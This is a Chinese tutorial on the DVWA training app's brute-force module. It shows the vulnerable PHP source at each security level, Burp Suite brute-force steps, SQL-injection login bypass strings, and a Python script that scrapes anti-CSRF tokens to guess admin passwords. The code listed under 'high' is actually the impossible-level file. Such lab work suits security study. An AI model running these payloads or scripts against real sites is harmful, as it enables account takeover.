之前寫了dvwa的sql注入的模塊,現在寫一下DVWA的其他實驗步驟:
環境搭建參考:https://www.freebuf.com/sectool/102661.html
DVWA簡介
DVWA(Damn Vulnerable Web Application)是一個用來進行安全脆弱性鑒定的PHP/MySQL Web應用,旨在為安全專業人員測試自己的專業技能和工具提供合法的環境,幫助web開發者更好的理解web應用安全防范的過程。
DVWA共有十個模塊,分別是Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站請求偽造)、File Inclusion(文件包含)、File Upload(文件上傳)、Insecure CAPTCHA(不安全的驗證碼)、SQL Injection(SQL注入)、SQL Injection(Blind)(SQL盲注)、XSS(Reflected)(反射型跨站腳本)、XSS(Stored)(存儲型跨站腳本)。
Brute Force
Brute Force,即暴力(破解),是指黑客利用密碼字典,使用窮舉法猜解出用戶口令,是現在最為廣泛使用的攻擊手法之一,如2014年轟動全國的12306“撞庫”事件,實質就是暴力破解攻擊。
low級別:
觀察源代碼:
<?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); if( $result && mysqli_num_rows( $result ) == 1 ) { // Get users details $row = mysqli_fetch_assoc( $result ); $avatar = $row["avatar"]; // Login successful echo "<p>歡迎使用密碼保護區 {$user}</p>"; echo "<img src=\"{$avatar}\" />"; } else { // Login failed echo "<pre><br />用戶名或密碼不正確.</pre>"; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>
可以看到,服務器只是驗證了參數Login是否被設置(isset函數在php中用來檢測變量是否設置,該函數返回的是布爾類型的值,即true/false),沒有任何的防爆破機制,且對參數username、password沒有做任何過濾,存在明顯的sql注入漏洞。
方法一:使用burpsuite抓包爆破:
瀏覽器設置代理模式:
在登陸框中輸入並抓包得到數據:然后發送到爆破模塊
然后清楚全部變量,對username和password添加變量進行暴力破解:並設置爆破類型為cluster bomb類型(這樣才能同時爆破用戶名和密碼)
然后對兩個變量分別載入字典:
設置線程:
然后開始爆破:
可以看到里面有一個的length長度不一樣,這個的返回值就是正確的,這樣就從字典爆破出了用戶名和密碼。
第二種方法:手工注入。雖然這是爆破破解模塊,但是因為網頁防護等級較低,所以也可以sql注入。
一、用戶名為:admin‘# 密碼隨意即可登陸
二、用戶名為:admin ’ or ‘1’=‘1 密碼隨意
Medium級別:
觀察代碼:
<?php if( isset( $_GET[ 'Login' ] ) ) { // Sanitise username input $user = $_GET[ 'username' ]; $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Sanitise password input $pass = $_GET[ 'password' ]; $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); if( $result && mysqli_num_rows( $result ) == 1 ) { // Get users details $row = mysqli_fetch_assoc( $result ); $avatar = $row["avatar"]; // Login successful echo "<p>歡迎使用密碼保護區 {$user}</p>"; echo "<img src=\"{$avatar}\" />"; } else { // Login failed sleep( 2 ); echo "<pre><br />用戶名或密碼不正確.</pre>"; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>
相比Low級別的代碼,Medium級別的代碼主要增加了mysql_real_escape_string函數,這個函數會對字符串中的特殊符號(x00,n,r,,’,”,x1a)進行轉義,基本上能夠抵御sql注入攻擊,說基本上是因為查到說 MySQL5.5.37以下版本如果設置編碼為GBK,能夠構造編碼繞過mysql_real_escape_string 對單引號的轉義(因實驗環境的MySQL版本較新,所以並未做相應驗證);同時,$pass做了MD5校驗,杜絕了通過參數password進行sql注入的可能性。但是,依然沒有加入有效的防爆破機制(sleep(2)實在算不上)。
但是依然可以用暴力破解的方式,步驟與上面完全一樣,所以不再贅述。
high級別
觀察代碼:
Brute Force Source vulnerabilities/brute/source/impossible.php <?php if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Sanitise username input $user = $_POST[ 'username' ]; $user = stripslashes( $user ); $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Sanitise password input $pass = $_POST[ 'password' ]; $pass = stripslashes( $pass ); $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass = md5( $pass ); // Default values $total_failed_login = 3; $lockout_time = 15; $account_locked = false; // Check the database (Check user information) $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch(); // Check to see if the user has been locked out. if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) { // User locked out. Note, using this method would allow for user enumeration! //echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>"; // Calculate when the user would be allowed to login again $last_login = strtotime( $row[ 'last_login' ] ); $timeout = $last_login + ($lockout_time * 60); $timenow = time(); /* print "The last login was: " . date ("h:i:s", $last_login) . "<br />"; print "The timenow is: " . date ("h:i:s", $timenow) . "<br />"; print "The timeout is: " . date ("h:i:s", $timeout) . "<br />"; */ // Check to see if enough time has passed, if it hasn't locked the account if( $timenow < $timeout ) { $account_locked = true; // print "The account is locked<br />"; } } // Check the database (if username matches the password) $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR); $data->bindParam( ':password', $pass, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch(); // If its a valid login... if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) { // Get users details $avatar = $row[ 'avatar' ]; $failed_login = $row[ 'failed_login' ]; $last_login = $row[ 'last_login' ]; // Login successful echo "<p>歡迎使用密碼保護區 <em>{$user}</em></p>"; echo "<img src=\"{$avatar}\" />"; // Had the account been locked out since last login? if( $failed_login >= $total_failed_login ) { echo "<p><em>警告</em>: 有人可能暴力破解你的帳戶.</p>"; echo "<p>登錄嘗試次數: <em>{$failed_login}</em>.<br />上次登錄嘗試時間: <em>${last_login}</em>.</p>"; } // Reset bad login count $data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); } else { // Login failed sleep( rand( 2, 4 ) ); // Give the user some feedback echo "<pre><br />用戶名或密碼不正確.<br /><br/>或者,由於登錄失敗太多,帳戶已被鎖定.<br />如果是這樣的話, <em>請在 {$lockout_time} 分鍾后嘗試</em>.</pre>"; // Update bad login count $data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); } // Set the last login time $data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' ); $data->bindParam( ':user', $user, PDO::PARAM_STR ); $data->execute(); } // Generate Anti-CSRF token generateSessionToken(); ?>
High級別的代碼加入了Token,可以抵御CSRF攻擊,同時也增加了爆破的難度,通過抓包,可以看到,登錄驗證時提交了四個參數:username、password、Login以及user_token。
每次服務器返回的登陸頁面中都會包含一個隨機的user_token的值,用戶每次登錄時都要將user_token一起提交。服務器收到請求后,會優先做token的檢查,再進行sql查詢。
同時,High級別的代碼中,使用了stripslashes(去除字符串中的反斜線字符,如果有兩個連續的反斜線,則只去掉一個)、 mysql_real_escape_string對參數username、password進行過濾、轉義,進一步抵御sql注入。
由於加入了Anti-CSRFtoken預防無腦爆破,第一種辦法是簡單用python寫個腳本:
from bs4 import BeautifulSoup import urllib2 header={ 'Host': '192.168.153.130', 'Cache-Control': 'max-age=0', 'If-None-Match': "307-52156c6a290c0", 'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36', 'Accept': '*/*', 'Referer': 'http://192.168.153.130/dvwa/vulnerabilities/brute/index.php', 'Accept-Encoding': 'gzip, deflate, sdch', 'Accept-Language': 'zh-CN,zh;q=0.8', 'Cookie': 'security=high; PHPSESSID=5re92j36t4f2k1gvnqdf958bi2'} requrl = "http://192.168.153.130/dvwa/vulnerabilities/brute/" def get_token(requrl,header): req = urllib2.Request(url=requrl,headers=header) response = urllib2.urlopen(req) print response.getcode(), the_page = response.read() print len(the_page) soup = BeautifulSoup(the_page,"html.parser") user_token = soup.form.input.input.input.input["value"] #get the user_token return user_token user_token = get_token(requrl,header) i=0 for line in open("rkolin.txt"): requrl = "http://192.168.153.130/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token i = i+1 print i,'admin',line.strip(), user_token = get_token(requrl,header) if (i == 10): break
get_token的功能是通過python的BeautifulSoup庫從html頁面中抓取user_token的值,為了方便展示,這里設置只嘗試10次。
打印的結果從第二行開始依次是序號、用戶名、密碼、http狀態碼以及返回的頁面長度。
第二種辦法還是使用burpsuite:
設置token為變量
在grep extract添加token
payload類型設置recursive grep 然后注意設置單線程才行
attack得到用戶名和密碼
Impossible
Impossible級別的代碼加入了可靠的防爆破機制,當檢測到頻繁的錯誤登錄后,系統會將賬戶鎖定,爆破也就無法繼續。
同時采用了更為安全的PDO(PHP Data Object)機制防御sql注入,這是因為不能使用PDO擴展本身執行任何數據庫操作,而sql注入的關鍵就是通過破壞sql語句結構執行惡意的sql命令。